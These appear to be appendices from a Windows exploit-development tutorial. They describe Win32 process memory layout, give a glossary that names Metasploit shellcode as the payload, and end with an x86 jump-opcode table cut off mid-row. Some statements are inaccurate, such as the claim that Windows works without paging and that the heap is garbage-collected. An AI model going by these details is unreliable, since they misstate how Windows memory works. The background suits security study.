Windows uses a flat memory model, which means the CPU can directly/sequentially/linearly address all available memory locations without needing segmentation or paging. Kernel-land memory is only accessible by the OS. When a process is created, the PEB (Process Execution Block) and TEB (Thread Environment Block) are created as well.
The PEB contains all user-land parameters associated with the current process:
- the location of the main executable
- a pointer to the loader data (used to list all dlls/modules loaded in the process)
- a pointer to the heap information
The TEB describes the state of the process, including:
- the location of the PEB in memory
- the location of the stack for the process it belongs to
- a pointer to the first entry of the SEH chain
Every thread inside a process has a TEB.
Appendix figure: memory map of a Win32 process
The text segment in the program image is read-only and contains only application code. This prevents modification of the application code. The data segment is used to store global and static variables. The data segment is used for initialized global variables, strings and constants. The data segment is writable and has a fixed size. The heap segment is used for the rest of the program variables. It can grow larger or smaller as designed. All memory in the heap is managed by allocation and garbage-collection algorithms. A memory region is reserved by the algorithm. The heap grows towards higher addresses. In a dll, the code, the imports (the list of functions the dll uses from other dlls or from the application) and the exports are part of the .text segment.

3. APPENDIX 3
C, C++, Perl: these are high-level programming languages.
Readme: usually the name of a text file on the installation media of an application program, containing last-minute information that is not found in the program's user manual.
It is the typical name for such a file.
instance methods: object-oriented methods, used in object-oriented programming languages.
thread: a thread (a processor thread).
Disassembly: a computer program whose task is to translate machine language into the low-level assembly language.
Debugger: a computer program used to test and find bugs in other computer programs.
NOP (No Operation Performed): on this instruction the program passes through without performing any action.
Opcode (operation code): the term for codes written in machine language that tell the machine which operations to perform. The structure of an opcode depends on the type of machine and on the machine language its processor can recognize.
Payload: the main data part. Here the payload is the shellcode provided by metasploit.
RET: an instruction of the assembly language; it adds 4 bytes to ESP.
Devcpp: a computer program that supports writing and compiling C/C++.

4. APPENDIX 4: OPCODE TABLE OF THE JUMP INSTRUCTIONS AND FLAGS

Code          Mnemonic         Description
77 cb         JA rel8          Jump short if above (CF=0 and ZF=0)
73 cb         JAE rel8         Jump short if above or equal (CF=0)
72 cb         JB rel8          Jump short if below (CF=1)
76 cb         JBE rel8         Jump short if below or equal (CF=1 or ZF=1)
72 cb         JC rel8          Jump short if carry (CF=1)
E3 cb         JCXZ rel8        Jump short if CX register is 0
E3 cb         JECXZ rel8       Jump short if ECX register is 0
74 cb         JE rel8          Jump short if equal (ZF=1)
7F cb         JG rel8          Jump short if greater (ZF=0 and SF=OF)
7D cb         JGE rel8         Jump short if greater or equal (SF=OF)
7C cb         JL rel8          Jump short if less (SF≠OF)
7E cb         JLE rel8         Jump short if less or equal (ZF=1 or SF≠OF)
76 cb         JNA rel8         Jump short if not above (CF=1 or ZF=1)
72 cb         JNAE rel8        Jump short if not above or equal (CF=1)
73 cb         JNB rel8         Jump short if not below (CF=0)
77 cb         JNBE rel8        Jump short if not below or equal (CF=0 and ZF=0)
73 cb         JNC rel8         Jump short if not carry (CF=0)
75 cb         JNE rel8         Jump short if not equal (ZF=0)
7E cb         JNG rel8         Jump short if not greater (ZF=1 or SF≠OF)
7C cb         JNGE rel8        Jump short if not greater or equal (SF≠OF)
7D cb         JNL rel8         Jump short if not less (SF=OF)
7F cb         JNLE rel8        Jump short if not less or equal (ZF=0 and SF=OF)
71 cb         JNO rel8         Jump short if not overflow (OF=0)
7B cb         JNP rel8         Jump short if not parity (PF=0)
79 cb         JNS rel8         Jump short if not sign (SF=0)
75 cb         JNZ rel8         Jump short if not zero (ZF=0)
70 cb         JO rel8          Jump short if overflow (OF=1)
7A cb         JP rel8          Jump short if parity (PF=1)
7A cb         JPE rel8         Jump short if parity even (PF=1)
7B cb         JPO rel8         Jump short if parity odd (PF=0)
78 cb         JS rel8          Jump short if sign (SF=1)
74 cb         JZ rel8          Jump short if zero (ZF=1)
0F 87 cw/cd   JA rel16/32      Jump near if above (CF=0 and ZF=0)
0F 83 cw/cd   JAE rel16/32     Jump near if above or equal (CF=0)
0F 82 cw/cd   JB rel16/32      Jump near if below (CF=1)
0F 86 cw/cd   JBE rel16/32     Jump near if below or equal (CF=1 or ZF=1)
0F 82 cw/cd   JC rel16/32      Jump near if carry (CF=1)
0F 84 cw/cd   JE rel16/32      Jump near if equal (ZF=1)
0F 84 cw/cd   JZ rel16/32      Jump near if 0 (ZF=1)
0F 8F cw/cd   JG rel16/32      Jump near if greater (ZF=0 and SF=OF)
0F 8D cw/cd   JGE rel16/32     Jump near if greater or equal (SF=OF)
0F 8C cw/cd   JL rel16/32      Jump near if less (SF≠OF)
0F 8E cw/cd   JLE rel16/32     Jump near if less or equal (ZF=1 or SF≠OF)
0F 86 cw/cd   JNA rel16/32     Jump near if not above (CF=1 or ZF=1)
0F 82 cw/cd   JNAE rel16/32    Jump near if not above or equal (CF=1)
0F 83 cw/cd   JNB rel16/32     Jump near if not below (CF=0)
0F 87 cw/cd   JNBE rel16/32    Jump near if not below or equal (CF=0 and ZF=0)
0F 83 cw/cd   JNC rel16/32     Jump near if not carry (CF=0)
0F 85